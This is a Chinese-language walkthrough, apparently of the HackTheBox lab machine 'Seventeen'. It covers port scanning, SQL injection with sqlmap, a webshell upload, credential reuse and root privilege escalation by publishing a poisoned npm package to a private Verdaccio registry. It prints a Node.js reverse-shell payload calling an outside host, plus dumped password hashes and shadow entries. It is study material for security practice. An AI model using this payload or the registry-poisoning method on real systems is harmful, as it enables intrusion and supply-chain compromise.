基本信息

端口扫描

22,80,8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nmap -sC -sV -Pn 10.10.11.165
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-18 23:15 CST
Nmap scan report for 10.10.11.165
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2eb26ebb927d5e6b3693171a8209e464 (RSA)
|   256 1f57c653fc2d8b517d304202a4d65f44 (ECDSA)
|_  256 d5a5363819fe0d677916e6da1791ebad (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Let's begin your education with us!
8000/tcp open  http    Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 403 Forbidden
Service Info: Host: 172.17.0.4; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.21 seconds

80

一个教育相关的,可以得到对应域名:

1
2
$ curl -s 10.10.11.165 | grep seventeen | html2text | head -n1
seventeen.htb

8000

直接访问是403:

子域名扫描

添加hosts后扫描子域名,发现exam:

1
2
3
4
5
10.10.11.165 seventeen.htb

gobuster vhost -u http://seventeen.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Found: exam.seventeen.htb (Status: 200) [Size: 17375]

exam.seventeen.htb

一个考试管理系统:

sql注入

exam系统搜索发现sql注入:

1
2
3
4
5
6
7
sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" --batch -dbs

available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb

信息

dump数据库,sfms student表中得到一个账号密码,erms user中以及oldmanagement路径:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" --batch -D db_sfms --dump

Database: db_sfms
[3 tables]
+---------+
| user    |
| storage |
| student |
+---------+

Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password                                           | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1       | 1A | Male   | 12345   | Smith    | 1a40620f9a4ed6cb8d81a1d365559233                   | John      |
| 2       | 2B | Male   | 23347   | Mille    | abb635c915b0cc296e071e8d76e9060c                   | James     |
| 3       | 2C | Female | 31234   | Shane    | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly     |
| 4       | 3C | Female | 43347   | Hales    | a1428092eb55781de5eb4fd5e2ceb835                   | Jamie     |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+

Database: erms_db
Table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar                            | lastname | password                         | username         | firstname    | date_added          | last_login | date_updated        |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1  | 1    | ../oldmanagement/files/avatar.png | Admin    | fc8ec7b43523e186a27f46957818391c | admin            | Adminstrator | 2021-01-20 14:02:37 | NULL       | 2022-02-24 22:00:15 |
| 6  | 2    | ../oldmanagement/files/avatar.png | Anthony  | 48bb86d036bb993dfdcf7fefdc60cc06 | UndetectableMark | Mark         | 2021-09-30 16:34:02 | NULL       | 2022-05-10 08:21:39 |
| 7  | 2    | ../oldmanagement/files/avatar.png | Smith    | 184fe92824bea12486ae9a56050228ee | Stev1992         | Steven       | 2022-02-22 21:05:07 | NULL       | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+

oldmanagement

这个路径是8000端口的,使用得到的账号密码登录,发现文件上传功能:

webshell

直接上传是在学生id目录下不解析,修改一下传到上层目录即可:

reverse shell

信息

php文件中得到账号密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www-data@5ec5dfc2216b:/var/www/html/employeemanagementsystem/process$ cat dbh.php
</html/employeemanagementsystem/process$ cat dbh.php
<?php

$servername = "localhost";
$dBUsername = "root";
$dbPassword = "2020bestyearofmylife";
$dBName = "ems";

$conn = mysqli_connect($servername, $dBUsername, $dbPassword, $dBName);

if(!$conn){
	echo "Databese Connection Failed";
}

?>
www-data@5ec5dfc2216b:/var/www/html/employeemanagementsystem/process$ pwd
pwd
/var/www/html/employeemanagementsystem/process

查看用户信息发现mark:

1
2
3
4
www-data@5ec5dfc2216b:/var/www$ cat /etc/passwd | grep sh$
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
mark:x:1000:1000:,,,:/var/www/html:/bin/bash

user flag

mark用户密码就是数据库密码,ssh登录:

kavi

再次检查,会发现kavi:

1
2
3
4
mark@seventeen:/var/www/html$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
kavi:x:1000:1000:kavi:/home/kavi:/bin/bash
mark:x:1001:1001:,,,:/home/mark:/bin/bash

opt目录下发现一个nodejs应用,安装有一些模块,但我们没有读权限

查看端口发现4873, 搜索资料发现是Verdaccio的端口:

1
2
3
mark@seventeen:/tmp$ ss -tunlp

tcp    LISTEN   0        128             127.0.0.1:4873           0.0.0.0:*

所以这些很可能是私有npm模块,我们可以尝试以当前用户安装这些模块,查看其中内容

db-logger

直接npm安装对应模块,查看内容,在其中发现一个密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
npm --registry http://127.0.0.1:4873 info db-logger

npm --registry http://127.0.0.1:4873 install db-logger

mark@seventeen:/tmp$ cd node_modules/db-logger/
mark@seventeen:/tmp/node_modules/db-logger$ ls
logger.js  package.json
mark@seventeen:/tmp/node_modules/db-logger$ cat logger.js
var mysql = require('mysql');

var con = mysql.createConnection({
  host: "localhost",
  user: "root",
  password: "IhateMathematics123#",
  database: "logger"
});

function log(msg) {
    con.connect(function(err) {
        if (err) throw err;
        var date = Date();
        var sql = `INSERT INTO logs (time, msg) VALUES (${date}, ${msg});`;
        con.query(sql, function (err, result) {
        if (err) throw err;
        console.log("[+] Logged");
        });
    });
};

module.exports.log = log

kavi again

得到的密码就是kavi密码,ssh登录:

提权信息

根据上面的显示结果,查看对应文件内容,发现是安装两个模块后运行app,loglevel原本是没有安装的,运行后会安装,如果我们修改kavi用户的npmrc文件,即可控制安装来源,从而安装恶意模块,然后以root身份被执行:

提权 & root flag

根据文档自己本地npm package server,托管恶意模块:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 启动server
npm install --global verdaccio
verdaccio --listen 0.0.0.0:4873

# 制作package
# server上原本package下载下来修改
kavi@seventeen:/tmp/miao$ npm install loglevel
kavi@seventeen:/tmp/miao/node_modules$ zip -r ./loglevel.zip loglevel/*

nano lib/loglevel.js
# 在开头添加恶意代码

npm adduser --registry http://localhost:4873
npm login --registry http://localhost:4873
npm unpublish --force --registry http://localhost:4873
npm publish --registry http://localhost:4873

然后运行,恶意模块被安装,代码被执行,得到root:

evil code

1
2
3
4
5
6
7
8
9
10
11
12
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    client.connect(4444, "10.10.14.19", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

shadow

1
2
3
root:$6$zKJAdLXN$2q2KQQs7CNXr6p.GJAuzESBeX97RB2cdQID4hUUv12CIZvEhCATo8JqsvzVghUlHGVfHXgAuWIVE.GtdVVZPw.:19092:0:99999:7:::
kavi:$6$p67ISnef$mypsB6eaLk.iD7WzNHdnZBoKO1O1OgIE1E6pQ.7LidVs4O7TYNvnMkEMVFYXTrmxazGhMHf07HTwFyySxhY.V.:19092:0:99999:7:::
mark:$6$wQBYfx4H$H65tyKF3GL/61g4gr02xDnu5R4NerpbwhjO5ySUwx8Z701bfRLpXTli79hG67okVJQ6wlueO5NYWCVLONguxU1:19092:0:99999:7:::

参考资料